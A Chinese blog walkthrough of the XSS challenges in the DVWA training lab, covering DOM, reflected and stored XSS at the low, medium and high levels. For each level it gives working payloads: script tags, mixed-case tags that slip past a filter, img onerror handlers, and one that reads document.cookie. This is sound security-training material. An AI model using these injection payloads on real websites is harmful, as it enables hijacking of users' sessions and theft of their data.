当前位置: 首页 > news >正文

DVWA在线靶场-xss部分

目录

1. xxs(dom)

1.1 low

1.2 medium  

1.3 high

1.4 impossible

2. xss(reflected) 反射型

2.1 low

2.2 medium

2.3 high

2.4 impossible

3. xss(stored)存储型 --留言板

3.1 low

3.2 medium

3.3 high

3.4 impossible


1. xxs(dom)

1.1 low

直接在url或者输入款输入

<script>alert(1)</script>

1.2 medium  

</select><img src='1' οnerrοr='alert(1)'>
</select><img src=1 onerror=alert(1)>

如果出现破碎图片,说明命令有问题,需要手动输入,不能复制粘贴,后面发现onerror有问题,删除手动输入即可,我在这一步卡了很久

1.3 high

1. 使用锚部分弹窗

French#<script>alert(1)</script>
French<script>alert(1)</script>French<script>alert(document.cookie)</script>

1.4 impossible

无漏洞

2. xss(reflected) 反射型

2.1 low

输入什么输出什么

<script>alert(1)</script>

2.2 medium

<script>alert(1)</script>失效

<Script>alert(1)</Script>

大小写,需要在输入框输入,不能直接在url输入,url输入会直接转化为小写

源码,将<script>字符切换成空白

2.3 high

使用<img src=1 οnerrοr=alert(1);> 成功

<img src=1 οnerrοr=alert("qiu")> 成功

2.4 impossible

******

3. xss(stored)存储型 --留言板

3.1 low

<script>alert(1)</script>

3.2 medium

Message测试<Script>alert(1)</Script>无效。

name栏测试<Script>alert(1)</Script>可以,f12尝试解除name限制输入。

其他漏洞切换到xxs(stored),只要留言板存在恶意script语句,就会触发xss漏洞。

3.3 high

<img src=1 οnerrοr=alert(1)>

3.4 impossible

无漏洞

 参考:

DVWA靶场(七、盲注) - tonywell - 博客园

dvwa靶场通关教程(保姆及教学,一看就会)_dvwa通关教程-CSDN博客

DVWA-XSS(DOM型) - 西夏一品唐 - 博客园

http://www.xdnf.cn/news/402913.html

相关文章:

  • 【内网渗透】——S4u2扩展协议提权以及KDC欺骗提权
  • Nginx stream模块是连接级别的负载均衡
  • [计算机科学#14]:数据结构
  • 现代化水库运行管理矩阵平台如何建设?
  • DNS域名解析服务器的部署
  • 2025 年福建省职业院校技能大赛网络建设与运维赛项Linux赛题解析
  • 基于STM32、HAL库的CH342K USB转UART收发器 驱动程序设计
  • Spring Boot 注解详细解析:解锁高效开发的密钥
  • 中科院无人机导航物流配送的智能变革!LogisticsVLN:基于无人机视觉语言导航的低空终端配送系统
  • C++类与对象(二):六个默认构造函数(一)
  • 基于Qt6 + MuPDF在 Arm IMX6ULL运行的PDF浏览器——MuPDF Adapter文档
  • 《Python星球日记》 第64天:NLP 概述与文本预处理
  • 深度学习与机器学习模型全景解析:适用场景与最优实践指南
  • 【高并发架构设计】-1:高并发通用设计思想
  • LayerNorm vs RMSNorm 技术对比
  • [学习]RTKLib详解:ionex.c、options.c与preceph.c
  • 【PostgreSQL数据分析实战:从数据清洗到可视化全流程】金融风控分析案例-10.1 风险数据清洗与特征工程
  • Python语言在地球科学交叉领域中的应用——从数据可视化到常见数据分析方法的使用【实例操作】
  • Spring MVC 根据请求头 (如 Accept) 怎么返回 JSON 或 XML 数据?
  • 破解 Qt QProcess 在 Release 模式下的“卡死”之谜
  • 多模态大语言模型arxiv论文略读(七十一)
  • 基于Spring AI实现多轮对话系统架构设计
  • PHP 代理服务器:如何在 PHP 中设置代理
  • 热门CPS联盟小程序聚合平台与CPA推广系统开发搭建:助力流量变现与用户增长
  • Android Studio的jks文件
  • DDR的PCB设计(T点)
  • 力扣210(拓扑排序)
  • 1. 使用 IntelliJ IDEA 创建 React 项目:创建 React 项目界面详解;配置 Yarn 为包管理器
  • VLM-RL:用于安全自动驾驶的统一视觉语言模型和强化学习框架——论文阅读
  • vue3搭建实战项目笔记四